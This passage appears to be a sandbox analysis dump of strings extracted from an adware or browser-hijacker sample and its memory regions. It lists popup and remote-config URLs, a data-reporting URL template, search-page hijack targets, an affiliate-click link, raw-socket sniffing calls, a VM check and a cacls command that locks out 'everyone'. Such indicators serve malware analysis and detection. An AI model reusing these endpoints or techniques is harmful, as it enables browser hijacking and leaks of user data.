- 
Path of Zuko.exe</pre><pre>aveflo.exe</pre><pre>Avenue_Flo-2-Special_Delivery.exe</pre><pre>Avert Fate.exe</pre><pre>Aveyond - The Darkthrop Prophecy.exe</pre><pre>Aveyond.exe</pre><pre>AvP_Launcher.exe</pre><pre>AVPBG5.exe</pre><pre>Awakening_The_Dreamless_Castle.exe</pre><pre>Awakening2.exe</pre><pre>AWWIISniper.exe</pre><pre>Azada.exe</pre><pre>Aztaka.exe</pre><pre>AztecTribeNewLand.exe</pre><pre>Aztlan.exe</pre><pre>BaboLauncher.exe</pre><pre>Babylonia.exe</pre><pre>BackToTheFuture103.exe</pre><pre>BaiduHi.exe</pre><pre>baidump3.exe</pre><pre>Baja.exe</pre><pre>bakery.exe</pre><pre>bakgtasa_cn.exe</pre><pre>Ballistik.exe</pre><pre>Balloon-Diaspora.exe</pre><pre>bao.exe</pre><pre>baojia.exe</pre><pre>baoshimizhen2.exe</pre><pre>baoweizhenzhugang.exe</pre><pre>Battle_Realms_F.exe</pre><pre>battlecity.exe</pre><pre>BATTLECRUISER MILLENNIUM.exe</pre><pre>BATTLECRY III.EXE</pre><pre>BaXian.exe</pre><pre>BB.exe</pre><pre>BB2K12.exe</pre><pre>BBB.exe</pre><pre>Beach Party Craze.exe</pre><pre>Bears dream.exe</pre><pre>BeatBall2.exe</pre><pre>BeatHazard.exe</pre><pre>Becharmed.exe</pre><pre>Bee_Garden.exe</pre><pre>BEEP.exe</pre><pre>BeetleBomp.exe</pre><pre>Bejeweled2.exe</pre><pre>Bejeweled3.exe</pre><pre>BeRicher.exe</pre><pre>BFBC2Game.exe</pre><pre>bia.exe</pre><pre>Biathlon2009.exe</pre><pre>Bier_Tycoon.exe</pre><pre>Big_Kahuna_Reef.exe</pre><pre>BigFoot-SC2.exe</pre><pre>BigScore.exe</pre><pre>bilbo.exe</pre><pre>bio4_cn.exe</pre><pre>BioShock 2.exe</pre><pre>Birds Town.exe</pre><pre>BizLaunch.exe</pre><pre>bj2.exe</pre><pre>Black 
Buccaneer.exe</pre><pre>BlackOps.exe</pre><pre>Blendimals.exe</pre><pre>Blobsadventure2.exe</pre><pre>Blood.exe</pre><pre>BloodOver.exe</pre><pre>Bloom.exe</pre><pre>BlowfishBay.exe</pre><pre>Blowout.exe</pre><pre>Blur.exe</pre><pre>BOF3.exe</pre><pre>BOF4.exe</pre><pre>bomber.exe</pre><pre>Bomberic2.exe</pre><pre>Bond.exe</pre><pre>BookWorm.exe</pre><pre>Boonka.exe</pre><pre>Booster.exe</pre><pre>bor.exe</pre><pre>BounceQuest.exe</pre><pre>Bowman Legend.exe</pre><pre>BP3D-6 minutes.exe</pre><pre>bqt.exe</pre><pre>Brain Damage.exe</pre><pre>brave dwarves 2 gold.exe</pre><pre>Bricktopia.exe</pre><pre>Britney.exe</pre><pre>BrokenDimensions.exe</pre><pre>BrokenSword2.exe</pre><pre>BSG.exe</pre><pre>bshift.exe</pre><pre>btby6.exe</pre><pre>BTZLauncher.exe</pre><pre>BUBBLE.EXE</pre><pre>bubblebobble.exe</pre><pre>BugBits.exe</pre><pre>build.exe</pre><pre>Buildit.exe</pre><pre>Bullet Candy Perfect.exe</pre><pre>BulletZORZ.exe</pre><pre>BumbleTales.exe</pre><pre>bungee.exe</pre><pre>BunnyPets.exe</pre><pre>BurgerTime_Deluxe.exe</pre><pre>Burmad.exe</pre><pre>BurningWheels.exe</pre><pre>ButterflyEscape.exe</pre><pre>bw.exe</pre><pre>c2.exe</pre><pre>cabal.exe</pre><pre>Cake Mania 4.exe</pre><pre>CakeMania_EXP.exe</pre><pre>CakeMania2.exe</pre><pre>CakeMania3.exe</pre><pre>CakeShop3.exe</pre><pre>CanaanClient.exe</pre><pre>CandyBall.exe</pre><pre>CangHai.exe</pre><pre>cannon_strike.exe</pre><pre>Capsized.exe</pre><pre>Caramba.exe</pre><pre>CarBoosting.exe</pre><pre>Cars.exe</pre><pre>Cars_Mater.exe</pre><pre>caster.exe</pre><pre>castle.exe</pre><pre>castleattack2.exe</pre><pre>CATWOMAN.EXE</pre><pre>cblade.exe</pre><pre>CBox.exe</pre><pre>CBS.exe</pre><pre>CDS95.EXE</pre><pre>Chains.exe</pre><pre>Chalk.exe</pre><pre>championship manager 
2006.exe</pre><pre>6.00.2900.2668 
(xpsp.050430-1553)</pre><pre>6.00.2900.2668 (xpsp_sp2_gdr.050430-1553)</pre><pre>6.00.2900.2713 (xpsp.050702-1518)</pre><pre>6.00.2900.2713 (xpsp_sp2_gdr.050702-1513)</pre><pre>6.00.2900.2753 (xpsp.050902-1331)</pre><pre>6.00.2900.2781 (xpsp.051020-1728)</pre><pre>6.00.2900.2781 (xpsp_sp2_gdr.051020-1730)</pre><pre>6.00.2900.2823 (xpsp.060106-1527)</pre><pre>6.00.2900.2823 (xpsp_sp2_gdr.060106-1520)</pre><pre>6.00.2900.2861 (xpsp.060303-1528)</pre><pre>6.00.2900.2861 (xpsp_sp2_gdr.060303-1517)</pre><pre>6.00.2900.2904 (xpsp.060509-0230)</pre><pre>6.00.2900.2904 (xpsp_sp2_gdr.060509-0218)</pre><pre>6.00.2900.2937 (xpsp.060623-0011)</pre><pre>6.00.2900.2937 (xpsp_sp2_gdr.060623-0002)</pre><pre>6.00.2900.2995 (xpsp.060913-0019)</pre><pre>6.00.2900.2995 (xpsp_sp2_gdr.060913-0010)</pre><pre>6.00.2900.3020 (xpsp.061023-0222)</pre><pre>6.00.2900.3020 (xpsp_sp2_gdr.061023-0214)</pre><pre>6.00.2900.3059 (xpsp_sp2_gdr.070104-0050)</pre><pre>6.00.2900.3059 (xpsp_sp2_qfe.070104-0040)</pre><pre>6.00.2900.3086 (xpsp_sp2_gdr.070218-2314)</pre><pre>6.00.2900.3086 (xpsp_sp2_qfe.070218-2342)</pre><pre>6.00.2900.3121 (xpsp_sp2_gdr.070418-1302)</pre><pre>6.00.2900.3121 (xpsp_sp2_qfe.070418-1302)</pre><pre>6.00.2900.3164 (xpsp_sp2_gdr.070626-1259)</pre><pre>6.00.2900.3164 (xpsp_sp2_qfe.070626-1258)</pre><pre>6.00.2900.3199 (xpsp_sp2_gdr.070821-1257)</pre><pre>6.00.2900.3199 (xpsp_sp2_qfe.070821-1250)</pre><pre>6.00.2900.3231 (xpsp_sp2_gdr.071010-1320)</pre><pre>6.00.2900.3231 (xpsp_sp2_qfe.071010-1316)</pre><pre>6.00.2900.3268 (xpsp_sp2_gdr.071206-1518)</pre><pre>6.00.2900.3268 (xpsp_sp2_qfe.071206-1251)</pre><pre>6.00.2900.3300 (xpsp.080125-2028)</pre><pre>6.00.2900.3314 (xpsp_sp2_gdr.080215-1241)</pre><pre>6.00.2900.3314 (xpsp_sp2_qfe.080215-1242)</pre><pre>6.00.2900.3354 (xpsp_sp2_gdr.080417-1412)</pre><pre>6.00.2900.3354 (xpsp_sp2_qfe.080417-1416)</pre><pre>6.00.2900.3395 (xpsp_sp2_gdr.080623-1307)</pre><pre>6.00.2900.3395 (xpsp_sp2_qfe.080623-1318)</pre><pre>6.00.2900.3429 
(xpsp_sp2_gdr.080819-1231)</pre><pre>6.00.2900.3429 (xpsp_sp2_qfe.080819-1244)</pre><pre>6.00.2900.3462 (xpsp_sp2_gdr.081015-1244)</pre><pre>6.00.2900.3462 (xpsp_sp2_qfe.081015-1657)</pre><pre>6.00.2900.3527 (xpsp_sp2_gdr.090219-1253)</pre><pre>6.00.2900.3527 (xpsp_sp2_qfe.090219-1311)</pre><pre>6.00.2900.3562 (xpsp_sp2_gdr.090427-1232)</pre><pre>6.00.2900.3562 (xpsp_sp2_qfe.090427-1240)</pre><pre>6.00.2900.3592 (xpsp_sp2_gdr.090622-1453)</pre><pre>6.00.2900.3592 (xpsp_sp2_qfe.090622-1503)</pre><pre>6.00.2900.3627 (xpsp_sp2_gdr.090918-1238)</pre><pre>6.00.2900.3627 (xpsp_sp2_qfe.090918-1245)</pre><pre>6.00.2900.3640 (xpsp_sp2_gdr.091027-1355)</pre><pre>6.00.2900.3640 (xpsp_sp2_qfe.091027-1402)</pre><pre>6.00.2900.3660 (xpsp_sp2_gdr.091216-1517)</pre><pre>6.00.2900.3660 (xpsp_sp2_qfe.091216-1705)</pre><pre>6.00.2900.3676 (xpsp_sp2_gdr.100225-1250)</pre><pre>6.00.2900.3676 (xpsp_sp2_qfe.100225-1434)</pre><pre>6.00.2900.3698 (xpsp_sp2_gdr.100416-1705)</pre><pre>6.00.2900.3698 (xpsp_sp2_qfe.100416-1708)</pre><pre>6.00.2900.5512 (xpsp.080413-2105)</pre><pre>6.00.2900.5583 (xpsp_sp3_gdr.080417-1430)</pre><pre>6.00.2900.5583 (xpsp_sp3_qfe.080417-1431)</pre><pre>6.00.2900.5626 (xpsp_sp3_gdr.080623-1315)</pre><pre>6.00.2900.5626 (xpsp_sp3_qfe.080623-1331)</pre><pre>6.00.2900.5659 (xpsp_sp3_gdr.080819-1237)</pre><pre>6.00.2900.5659 (xpsp_sp3_qfe.080819-1352)</pre><pre>6.00.2900.5694 (xpsp_sp3_gdr.081015-1312)</pre><pre>6.00.2900.5694 (xpsp_sp3_qfe.081015-1409)</pre><pre>6.00.2900.5764 (xpsp_sp3_gdr.090219-1240)</pre><pre>6.00.2900.5764 (xpsp_sp3_qfe.090219-1311)</pre><pre>6.00.2900.5803 (xpsp_sp3_gdr.090428-1325)</pre><pre>6.00.2900.5803 (xpsp_sp3_qfe.090428-1347)</pre><pre>6.00.2900.5835 (xpsp_sp3_gdr.090626-1535)</pre><pre>6.00.2900.5835 (xpsp_sp3_qfe.090626-1600)</pre><pre>6.00.2900.5880 (xpsp_sp3_gdr.090924-1438)</pre><pre>6.00.2900.5880 (xpsp_sp3_qfe.090924-1448)</pre><pre>6.00.2900.5897 (xpsp_sp3_gdr.091028-1650)</pre><pre>6.00.2900.5897 
(xpsp_sp3_qfe.091028-1717)</pre><pre>6.00.2900.5921 (xpsp_sp3_gdr.091221-1718)</pre><pre>6.00.2900.5921 (xpsp_sp3_qfe.091221-1752)</pre><pre>6.00.2900.5945 (xpsp_sp3_gdr.100225-1251)</pre><pre>6.00.2900.5945 (xpsp_sp3_qfe.100225-1321)</pre><pre>6.00.2900.5969 (xpsp_sp3_gdr.100416-1716)</pre><pre>6.00.2900.5969 (xpsp_sp3_qfe.100416-1736)</pre><pre>6.00.2900.6003 (xpsp_sp3_gdr.100623-1635)</pre><pre>6.00.2900.6003 (xpsp_sp3_qfe.100623-1636)</pre><pre>6.00.2900.6036 (xpsp_sp3_gdr.100908-2023)</pre><pre>6.00.2900.6036 (xpsp_sp3_qfe.100908-2019)</pre><pre>6.00.2900.6049 (xpsp_sp3_gdr.101103-1638)</pre><pre>6.00.2900.6049 (xpsp_sp3_qfe.101103-1636)</pre><pre>6.00.2900.6058 (xpsp_sp3_gdr.101220-1709)</pre><pre>6.00.2900.6058 (xpsp_sp3_qfe.101220-1651)</pre><pre>6.00.2900.6082 (xpsp_sp3_gdr.110217-1622)</pre><pre>6.00.2900.6082 (xpsp_sp3_qfe.110217-1621)</pre><pre>6.00.2900.6104 (xpsp_sp3_gdr.110425-1624)</pre><pre>6.00.2900.6104 (xpsp_sp3_qfe.110425-1624)</pre><pre>6.00.2900.6126 (xpsp_sp3_gdr.110621-1627)</pre><pre>6.00.2900.6126 (xpsp_sp3_qfe.110621-1627)</pre><pre>6.00.2900.6148 (xpsp_sp3_gdr.110905-1615)</pre><pre>6.00.2900.6148 (xpsp_sp3_qfe.110905-1615)</pre><pre>6.00.2900.6168 (xpsp_sp3_gdr.111101-1829)</pre><pre>6.00.2900.6168 (xpsp_sp3_qfe.111101-1828)</pre><pre>6.00.2900.6182 (xpsp_sp3_gdr.111216-1642)</pre><pre>6.00.2900.6182 (xpsp_sp3_qfe.111216-1630)</pre><pre>6.00.2900.6197 (xpsp_sp3_gdr.120228-1720)</pre><pre>6.00.2900.6197 (xpsp_sp3_qfe.120228-1721)</pre><pre>6.00.2900.6228 (xpsp_sp3_gdr.120515-1618)</pre><pre>6.00.2900.6228 (xpsp_sp3_qfe.120515-1618)</pre><pre>6.00.2900.6254 (xpsp_sp3_gdr.120628-1618)</pre><pre>6.00.2900.6254 (xpsp_sp3_qfe.120628-1619)</pre><pre>6.00.2900.6287 (xpsp_sp3_gdr.120828-1631)</pre><pre>6.00.2900.6287 (xpsp_sp3_qfe.120828-1626)</pre><pre>6.00.2900.6309 (xpsp_sp3_gdr.121031-1323)</pre><pre>6.00.2900.6309 (xpsp_sp3_qfe.121031-1323)</pre><pre>6.00.2900.6357 (xpsp_sp3_gdr.130221-0418)</pre><pre>6.00.3790.0 
(srv03_rtm.030324-2048)</pre><pre>6.00.3790.118 (srv03_gdr.031205-1652)</pre><pre>6.00.3790.118 (srv03_qfe.031205-1652)</pre><pre>6.00.3790.1830 (srv03_sp1_rtm.050324-1447)</pre><pre>6.00.3790.186 (srv03_gdr.040410-1234)</pre><pre>6.00.3790.186 (srv03_qfe.040410-1236)</pre><pre>6.00.3790.2509 (srv03_sp1_gdr.050815-1517)</pre><pre>6.00.3790.2653 (srv03_sp1_gdr.060303-1536)</pre><pre>6.00.3790.2653 (srv03_sp1_qfe.060303-1552)</pre><pre>6.00.3790.2732 (srv03_sp1_gdr.060623-0310)</pre><pre>6.00.3790.2732 (srv03_sp1_qfe.060623-0318)</pre><pre>6.00.3790.2817 (srv03_sp1_gdr.061023-0100)</pre><pre>6.00.3790.2993 (srv03_sp1_gdr.070817-1316)</pre><pre>6.00.3790.2993 (srv03_sp1_qfe.070817-1316)</pre><pre>6.00.3790.3041 (srv03_sp1_gdr.071107-1901)</pre><pre>6.00.3790.3041 (srv03_sp1_qfe.071107-1901)</pre><pre>6.00.3790.3091 (srv03_sp1_gdr.080215-1206)</pre><pre>6.00.3790.3091 (srv03_sp1_qfe.080215-1206)</pre><pre>6.00.3790.3194 (srv03_sp1_gdr.080819-1207)</pre><pre>6.00.3790.3194 (srv03_sp1_qfe.080819-1207)</pre><pre>6.00.3790.3229 (srv03_sp1_gdr.081016-1620)</pre><pre>6.00.3790.3229 (srv03_sp1_qfe.081016-1620)</pre><pre>6.00.3790.3304 (srv03_sp1_gdr.090303-1204)</pre><pre>6.00.3790.3304 (srv03_sp1_qfe.090303-1204)</pre><pre>6.00.3790.3959 (srv03_sp2_rtm.070216-1710)</pre><pre>6.00.3790.4186 (srv03_sp2_gdr.071108-1306)</pre><pre>6.00.3790.4186 (srv03_sp2_qfe.071108-1306)</pre><pre>6.00.3790.4210 (srv03_sp2_qfe.071221-1418)</pre><pre>6.00.3790.4237 (srv03_sp2_gdr.080215-1206)</pre><pre>6.00.3790.4237 (srv03_sp2_qfe.080215-1206)</pre><pre>6.00.3790.4275 (srv03_sp2_gdr.080417-1307)</pre><pre>6.00.3790.4275 (srv03_sp2_qfe.080417-1307)</pre><pre>6.00.3790.4324 (srv03_sp2_qfe.080630-1205)</pre><pre>6.00.3790.4357 (srv03_sp2_gdr.080819-1207)</pre><pre>6.00.3790.4357 (srv03_sp2_qfe.080819-1207)</pre><pre>6.00.3790.4392 (srv03_sp2_gdr.081016-1620)</pre><pre>6.00.3790.4392 (srv03_sp2_qfe.081016-1620)</pre><pre>6.00.3790.4470 (srv03_sp2_gdr.090303-1204)</pre><pre>6.00.3790.4470 
(srv03_sp2_qfe.090303-1204)</pre><pre>6.00.3790.4504 (srv03_sp2_gdr.090428-1405)</pre><pre>6.00.3790.4504 (srv03_sp2_qfe.090428-1405)</pre><pre>6.00.3790.4539 (srv03_sp2_gdr.090626-1428)</pre><pre>6.00.3790.4539 (srv03_sp2_qfe.090626-1428)</pre><pre>6.00.3790.4589 (srv03_sp2_gdr.090914-1233)</pre><pre>6.00.3790.4589 (srv03_sp2_qfe.090914-1233)</pre><pre>6.00.3790.4672 (srv03_sp2_gdr.100225-1230)</pre><pre>6.00.3790.4672 (srv03_sp2_qfe.100225-1230)</pre><pre>6.00.3790.4696 (srv03_sp2_gdr.100419-1942)</pre><pre>6.00.3790.4732 (srv03_sp2_gdr.100623-0356)</pre><pre>6.00.3790.4732 (srv03_sp2_qfe.100623-0356)</pre><pre>6.00.3790.4772 (srv03_sp2_gdr.100908-1010)</pre><pre>6.00.3790.4772 (srv03_sp2_qfe.100908-1010)</pre><pre>6.00.3790.4795 (srv03_sp2_qfe.101103-0357)</pre><pre>6.00.3790.4807 (srv03_sp2_gdr.101220-0307)</pre><pre>6.00.3790.4807 (srv03_sp2_qfe.101220-0307)</pre><pre>6.00.3790.4835 (srv03_sp2_gdr.110222-0239)</pre><pre>6.00.3790.4835 (srv03_sp2_qfe.110222-0239)</pre><pre>6.00.3790.4857 (srv03_sp2_gdr.110425-0335)</pre><pre>6.00.3790.4857 (srv03_sp2_qfe.110425-0335)</pre><pre>6.00.3790.4879 (srv03_sp2_gdr.110621-0342)</pre><pre>6.00.3790.4879 (srv03_sp2_qfe.110621-0342)</pre><pre>6.00.3790.4904 (srv03_sp2_gdr.110905-0334)</pre><pre>6.00.3790.4904 (srv03_sp2_qfe.110905-0334)</pre><pre>6.00.3790.4929 (srv03_sp2_gdr.111104-0342)</pre><pre>6.00.3790.4929 (srv03_sp2_qfe.111104-0342)</pre><pre>6.00.3790.4944 (srv03_sp2_gdr.111216-0308)</pre><pre>6.00.3790.4944 (srv03_sp2_qfe.111216-0308)</pre><pre>6.00.3790.4969 (srv03_sp2_gdr.120228-0234)</pre><pre>6.00.3790.4969 (srv03_sp2_qfe.120228-0234)</pre><pre>6.00.3790.5004 (srv03_sp2_gdr.120515-0336)</pre><pre>6.00.3790.5004 (srv03_sp2_qfe.120515-0336)</pre><pre>6.00.3790.5029 (srv03_sp2_gdr.120628-0335)</pre><pre>6.00.3790.5029 (srv03_sp2_qfe.120628-0335)</pre><pre>6.00.3790.5060 (srv03_sp2_gdr.120824-0334)</pre><pre>6.00.3790.5060 (srv03_sp2_qfe.120824-0334)</pre><pre>6.00.3790.5080 
(srv03_sp2_gdr.121026-1534)</pre><pre>6.00.3790.5080 (srv03_sp2_qfe.121026-1534)</pre><pre>HTTP/1.</pre><pre>http://</pre><pre>HTTP/1.1 302 Moved Temporarily</pre><pre>http://cnrdn.com/</pre><pre>dwVAOffset:X</pre><pre>.data</pre><pre>x%X@0</pre><pre>`.bss</pre><pre>.rdata</pre><pre>.reloc</pre><pre>PEPack.dll</pre><pre>%s : X</pre><pre>More information: http://www.ibsensoftware.com/</pre><pre>3<3q3</pre><pre>WINDOWS</pre><pre>url=http://pop.4278.cn/mpop/index2.html</pre><pre>url=http://pop.4278.cn/qpop/</pre><pre>url=http://pop.4278.cn/apop/bootcount.html</pre><pre>url=http://pop.4278.cn/mpop/index.html</pre><pre>iexplore.exe|tango3.exe|360se.exe</pre><pre>qq.exe|Thunder.exe|QvodPlayer.exe|Storm.exe|XMP.exe</pre><pre>MiniIE.exe</pre><pre>%Program Files%\MiniIE.exe</pre><pre>%Program Files%\tango3\tango3.exe</pre><pre>http\shell\open\command</pre><pre>iexplore.exe</pre><pre>tango3.exe</pre><pre>CmdLine:%s</pre><pre>New ProcessId:%d</pre><pre>-url:%s -win:3 -delay:%d -id:%d</pre><pre>-url:%s -ref:%s -js:%s -win:8 -delay:%d -id:%d</pre><pre>X d d %s</pre><pre>:d</pre><pre>(d-d)</pre><pre>(d-d)</pre><pre>OnEvent win:%d url:%s</pre><pre>dwPid:X</pre><pre>szAdwinExeName:%s</pre><pre>gszAdWinPath:%s</pre><pre>AdWin:%s</pre><pre>12222221</pre><pre>\~DFA5846.TMP</pre><pre>User POP ID:%s</pre><pre>%Program Files%\Common Files\MvuijhKz.exe</pre><pre>szCommandLine:%s</pre><pre>UserName:%s</pre><pre>http://tt.woai310.com/client/config.ini</pre><pre>id:%u url %s</pre><pre>MT cid:d id:d win:d rang(d-d) %s</pre><pre>name %s %s</pre><pre>explorer.exe</pre><pre>, ini->ngroup=%d</pre><pre>StatusCode:%d</pre><pre>cache.bin</pre><pre>szCookieFile:%s</pre><pre>add_cache_entry:%s</pre><pre>%d %s</pre><pre>clear_cache_entry:%s</pre><pre>bDel=%d</pre><pre>user:%s</pre><pre>AppPath:%s</pre><pre>ParentPath:%s</pre><pre>RandName:%s</pre><pre>Create Rand Temp Path: %s</pre><pre>:%d: %s</pre><pre>0xX,</pre><pre>NtCreateProcessEx ProcessHandle:X ParentProcess:X</pre><pre>NtCreateProcessEx 
dwParentPid:%d</pre><pre>NtCreateProcessEx hPrcess:X</pre><pre>lpITA:X</pre><pre>bytes=%d-</pre><pre>bytes=%d-%d</pre><pre>HTTP/</pre><pre>HTTP/</pre><pre>ip dest port unreachable</pre><pre>unknown msg returned</pre><pre>localhost:%d.%d.%d.%d</pre><pre>%-8s: %d</pre><pre>%-8s: %d.%d.%d.%d</pre><pre>%-8s: X-X-X-X-X-X</pre><pre>xxxxxx</pre><pre>index:%d mac_str:%s</pre><pre>ATL:X</pre><pre>WM_COPYDATA, Len:%d</pre><pre>PPROCESS_MSG</pre><pre>COOKIES:%s</pre><pre>recv_len=%d, end size:%d</pre><pre>recv_len=%d</pre><pre>HttpSendRequest:</pre><pre>URI:%s</pre><pre>User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)</pre><pre>application/x-www-form-urlencoded</pre><pre>POST ok, ret=%d</pre><pre>cont_len:%d</pre><pre>header end ret:%d</pre><pre>LoopEnd ok retcode=%d</pre><pre>detail.tmall.com</pre><pre>http://s.click.taobao.com/t_js?tu=</pre><pre>(%d/%d),</pre><pre>CreateIpNetEntry() ret:%d</pre><pre>%s|%d|%s|%d|%d|%d|%s|%d</pre><pre>http://log.soomeng.com/sslog?</pre><pre>list.length=%d</pre><pre>szTime:%s</pre><pre>tmp:%s</pre><pre>http://tt.woai310.com/?do=post&u=%s&m=%s&c=%d&s=%d&r=%s&v=%s&p=%s</pre><pre>GetExtendedTcpTable</pre><pre>GetExtendedUdpTable</pre><pre>TCP Statistics for IPv4</pre><pre>Passive Opens</pre><pre>UDP Statistics for IPv4</pre><pre>No Ports</pre><pre>NTDLL.dll</pre><pre>%SystemRoot%\System32\ntoskrnl.exe</pre><pre>%s ModuleHandle:X</pre><pre>pNtHeader:X</pre><pre>image_size:%d</pre><pre>image_base:X</pre><pre>pDllMain:X</pre><pre>InitResult:%d</pre><pre>p_imp_lib_name:%s Ordinal:%d</pre><pre>OriginalFirstThunk:X FirstThunk:X</pre><pre>GetProcAddress SetFlags OK Addr:X</pre><pre>GetProcAddress PackTheFile OK Addr:X</pre><pre>bIsVM:%d</pre><pre>m_nTmCount:%d</pre><pre>RegFlag count:%d cmp:%d</pre><pre>UpdateRegList nShow:%d nReg:%d</pre><pre>RunSubmitThread nShow:%d nReg:%d</pre><pre>IsWindow:%d IsWindowVisible:%d</pre><pre>%d %d %d %d</pre><pre>New Msg:%d</pre><pre>Msg:%d id:%u 
Url:%s</pre><pre>http://www.sogou.com/index</pre><pre>http://www.baidu.com/index</pre><pre>http://www.soso.com/wbhp</pre><pre>http://www.soso.com/sp.shtml</pre><pre>http://www.google.com.hk/webhp</pre><pre>http://123.sogou.com/?</pre><pre>http://123.sogou.com/nh/?</pre><pre>http://www.tao123.com/?</pre><pre>http://www.wbindex.cn/sgnav/</pre><pre>http://www.wbindex.cn/ww/</pre><pre>http://www.sogou.com/sogou</pre><pre>http://www.baidu.com/baidu</pre><pre>http://www.baidu.com/s</pre><pre>http://www.soso.com/q</pre><pre>http://www.google.com.hk/search</pre><pre>TangoWeb</pre><pre>360chrome</pre><pre>firefox</pre><pre>twchrome</pre><pre>chrome</pre><pre>opera</pre><pre>Opera</pre><pre>HTTP GET</pre><pre>HostName:%s</pre><pre>LocalIP:%s</pre><pre>setsockopt(SOL_SOCKET,SO_RCVBUF,TRUE) nRet:%d</pre><pre>setsockopt(SOL_SOCKET,SO_REUSEADDR,TRUE) nRet:%d</pre><pre>setsockopt(IPPROTO_IP,IP_HDRINCL,TRUE) nRet:%d</pre><pre>WSAIoctl(SIO_RCVALL) nRet:%d</pre><pre>get_home_url_param:%d</pre><pre>m_lock_page_pid:%s</pre><pre>.wbindex.cn</pre><pre>PID: %-5d %s exe_id:%d page_type:%d page_id:%d pid:%s</pre><pre>Name1:%s</pre><pre>zcÁ</pre><pre>Lkcjzquw.exe</pre><pre>%Program Files%\Common Files\mdhc\cache.bin</pre><pre>%Program Files%\Common Files\mdhc\</pre><pre>sau.exe</pre><pre>%Program Files%\Common Files\</pre><pre>%Program Files%\Common Files\Lkcjzquw.exe</pre><pre>%Program Files%\Common Files\mdhc\dsau.exe</pre><pre>?456789:;<=</pre><pre>!" 
/><pre>MSAFD Tcpip [TCP/IP]</pre><pre>MSAFD Tcpip [UDP/IP]</pre><pre>MSAFD Tcpip [RAW/IP]</pre><pre>RSVP UDP Service Provider</pre><pre>\Device\NetBT_Tcpip</pre><pre>RSVP TCP Service Provider</pre><pre>MSAFD NetBIOS [\Device\NetBT_Tcpip_{01593444-4DB3-4CEB-A054-D07FB68368D6}] SEQPACKET 0</pre><pre>MSAFD NetBIOS [\Device\NetBT_Tcpip_{01593444-4DB3-4CEB-A054-D07FB68368D6}] DATAGRAM 0</pre><pre>MSAFD NetBIOS [\Device\NetBT_Tcpip_{4CBD1967-6C39-4808-987E-2ACE8650DA25}] SEQPACKET 1</pre><pre>MSAFD NetBIOS [\Device\NetBT_Tcpip_{4CBD1967-6C39-4808-987E-2ACE8650DA25}] DATAGRAM 1</pre><pre>MSAFD NetBIOS [\Device\NetBT_Tcpip_{152A0A5A-25FD-438F-BF04-B180CF0B9BAD}] SEQPACKET 2</pre><pre>MSAFD NetBIOS [\Device\NetBT_Tcpip_{152A0A5A-25FD-438F-BF04-B180CF0B9BAD}] DATAGRAM 2</pre><pre>tv_w32.dll</pre><pre>indicdll.dll</pre><pre>mshtml.dll</pre><pre>shell32.dll</pre><pre>msctfime.ime</pre><pre>msctf.dll</pre><pre>uxtheme.dll</pre><pre>Microsoft(R) Windows(R) Operating System</pre><pre>6, 0, 2900, 5512</pre><pre>6.00.2900.5512</pre><b>dsau.exe_3672_rwx_00960000_00009000:</b><pre>.text</pre><pre>`.bss</pre><pre>.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>KERNEL32.dll</pre><pre>.rsrc</pre><pre>.data</pre><pre>kernel32.dll</pre><pre>PEPack.dll</pre><pre>%s : X</pre><pre>12222221</pre><pre>More information: http://www.ibsensoftware.com/</pre><pre>3<3q3</pre><b>dsau.exe_3672_rwx_00CA0000_00053000:</b><pre>__MSVCRT_HEAP_SELECT</pre><pre>inflate 1.2.3 Copyright 1995-2005 Mark Adler</pre><pre>iexplore.exe</pre><pre>%Program Files%\Internet Explorer\iexplore.exe</pre><pre>explorer.exe</pre><pre>igfxsrvc.exe</pre><pre>{5D562E5F-741F-4b50-AB7B-7A997CEB9557}</pre><pre>{XXXX-XX-XX-XX-XXXXXX}</pre><pre>cacls.exe "%s" /e /d everyone</pre><pre>%Program 
Files%\E-yoo\EyooSechelper2.dll</pre><pre>http://</pre><pre>XXXXXXXXXXXXXXXX</pre><pre>Software\Microsoft\Windows\ShellNoRoam\TempCache</pre><pre>Software\Microsoft\Windows\ShellNoRoam\ShellCache</pre><pre>herollq.exe</pre><pre>WebPlayer2010.exe</pre><pre>VODPlayer.exe</pre><pre>JSKPBrowser.exe</pre><pre>ValeBrowser.exe</pre><pre>wmconfig.exe</pre><pre>NewBho.DLL</pre><pre>\ext\settings\{11f09afe-75ad-4e52-ab43-e09e9351ce17}</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\WCom Object</pre><pre>software\policies\microsoft\windows nt\dnsclient</pre><pre>ws2_32.dll</pre><pre>ole32.dll</pre><pre>ieui.dll</pre><pre>mshtml.dll</pre><pre>IEFrame.dll</pre><pre>iertutil.dll</pre><pre>User32.dll</pre><pre>SHLWAPI.dll</pre><pre>wininet.dll</pre><pre>urlmon.dll</pre><pre>mswsock.dll</pre><pre>ws2help.dll</pre><pre>RegOpenKeyExA</pre><pre>RegOpenKeyExW</pre><pre>NtQueryValueKey</pre><pre>NtOpenKey</pre><pre>ADVAPI32.dll</pre><pre>ntdll.dll</pre><pre>Kernel32.dll</pre><pre>dnsapi.dll</pre><pre>msvcrt</pre><pre>PubwinClient.exe</pre><pre>RunMe.exe</pre><pre>{11F09AFE-75AD-4E52-AB43-E09E9351CE17}</pre><pre>Shell.User\Group</pre><pre>oleaut32.dll</pre><pre>browseti.dll</pre><pre>hinthk.dll</pre><pre>zclm8.com</pre><pre>wq581.com</pre><pre>maimeng8.com</pre><pre>5sla.com</pre><pre>wb360.net</pre><pre>renren.com</pre><pre>jj123.com.cn</pre><pre>wb12318.com</pre><pre>iwb110.com</pre><pre>woai310.com</pre><pre>http://123.sogou.com</pre><pre>http://www.sogou.com/sogou</pre><pre>http://www.sogou.com/index</pre><pre>.info</pre><pre>http://baidu.com</pre><pre>{X-X-x-XX-XXXXXX}</pre><pre>www.soso.com</pre><pre>www.google.com</pre><pre>www.hao123.com</pre><pre>www.tao123.com</pre><pre>www.baidu.com</pre><pre>123.sogou.com</pre><pre>www.sogou.com</pre><pre>www.iwb110.com</pre><pre>rpcrt4.dll</pre><pre>kernel32.dll</pre><pre>{xxxx-xx-xx-xx-xxxxxx}</pre><pre>127.0.0.1</pre><pre>208.67.222.222</pre><pre>208.67.220.220</pre><pre>114.114.114.114</pre><pre>114.114.115.115</pre><pre>8.8.
